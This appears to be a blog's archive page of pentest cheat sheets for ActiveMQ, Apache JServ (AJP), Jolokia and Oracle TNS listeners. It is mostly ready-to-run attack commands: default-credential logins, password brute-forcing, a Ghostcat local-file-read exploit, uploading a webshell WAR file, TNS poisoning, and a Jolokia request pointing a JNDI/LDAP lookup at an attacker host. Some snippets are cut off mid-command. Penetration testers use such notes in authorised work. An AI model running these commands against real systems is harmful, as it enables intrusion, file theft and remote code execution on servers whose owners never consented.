Posts

Showing posts from November, 2022

ActiveMQ OpenWire Transport Pentest

#Commonly Observed on Ports - 32064, 32357, 61616. You will find it together with RMI (1099 Port) & a webserver (6161 - jetty)

Nmap Scan
nmap -sV -Pn -n -T4 --script amqp-info -p 61616 10.10.10.10

Web server -- http://10.10.10.10:8161/admin -> default creds - admin:admin

#Query the server
curl -d 'body="Hello World"' "http://10.10.10.10:8161/demo/message/test?type=queue&clientId=consumerA"
curl -u admin:admin -d "body=message" http://localhost:8161/api/message/TEST?type=queue

Connecting to ActiveMQ (Might require creds)
#Download activemq from here
unzip filename
go to conf/activemq-cli.config --> and update the IP Address
broker {
  local {
    amqurl = "tcp://10.10.10.10:32064"
    jmxurl = "service:jmx:rmi:///jndi/rmi://10.10.10.10:1099/jmxrmi"
    username = ""
    password = ""
    prompt-color = "light-blue&q

Apache Jserv - Port 8009

NMAP
nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 10.10.10.10

Ghost Vulnerability - LFI
Patched versions: after 9.0.31, 8.5.51, and 7.0.100
git clone https://github.com/doggycheng/CNVD-2020-10487.git
python CNVD-2020-10487-Tomcat-Ajp-lfi.py -f /index.jsp 192.168.125.128

AJPY
git clone https://github.com/hypn0s/AJPy.git
python3 setup.py install
#Get Version
python tomcat.py version 10.10.10.10
python tomcat.py -v bf -U /opt/metasploit-framework/embedded/framework/data/wordlists/tomcat_mgr_default_users.txt -P /opt/metasploit-framework/embedded/framework/data/wordlists/tomcat_mgr_default_users.txt /manager/html 10.10.10.10
#Upload WAR File
python tomcat.py upload -u tomcat -p tomcat webshell.war 172.17.0.2
#List available applications
python tomcat.py list -u tomcat -p tomcat 172.17.0.2
#GHOST LFI CVE exploit
python tomcat.py read_file --webapp=examples /WEB-INF/web.xml 172.17.0.2

Other attacks - Rev proxy attack nginx Module abuse - Re

Jolokia Pentest

Usually found under - No Default port - can be used under any webserver
/jolokia
/actuator/jolokia
#Get basic Version info and where it is being used
curl http://10.10.10.10:8899/jolokia/
#Get the list of functions
curl http://10.10.10.10/jolokia/list
#Check Vuln Status to AccessLogValve Exploit
curl -kL http://10.10.10.10:8080/jolokia/read/Catalina:host=localhost,name=AccessLogValve,type=Valve
#Access an instance
curl -d '{ "type" : "read", "mbean" : "java.lang:type=Memory", "target" : { "url" : "service:jmx:rmi:///jndi/ldap://ATTACKER_IP:8001/jmxrm" } }' 'http://VICTIM_IP:8080/jolokia/'

Jolokia Tool Kit
git clone https://github.com/laluka/jolokia-exploitation-toolkit
python jolokia-parser.py http://10.10.10.10:8899/jolokia/ | tee jolokia-list.log
#Command EXEC - Based on the output create the command
grep createStandardHost jolokia-list.log
curl -skg 'http:

Pentesting Oracle TNS listener/ Database - Port 1521

#nmap
nmap -Pn -sV -p1521 --script=oracle* 10.10.10.10
#Check for service Version
#Oracle Database 11g 11.1.0.7, 11.2.0.2, and 11.2.0.3, and 10g 10.2.0.3, 10.2.0.4, and 10.2.0.5,
#try this exploit
GitHub - bongbongco/CVE-2012-1675: Oracle Database TNS Listener Poison Attack Vulnerability
nmap -Pn -sT --script=+oracle-tns-poison.nse -p 1521 10.10.10.10

Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP

ODAT - Oracle Database Attacking Tool
#Download the release
https://github.com/quentinhardy/odat/releases/
tar -xvf filename
#Run
./odat all -s 10.10.10.10
./odat all -s 10.10.10.10 -d SID_NAME
./odat all -s 10.10.10.10 -d ''
#Check with creds
./odat all -s 192.168.1.254 -p 1521 -d ORCL -U SYS -P password
#bruteforce when you know SID
./odat all -s 10.10.10.10 -d '' --accounts-file accounts/accounts_multiple.txt
#Enum - Doesn't work if password protected
sudo apt install tnscmd10g
#Version
tnscmd10g version -h 10.10.10.10
#Status
tnscmd10g status -h 10.10.10.10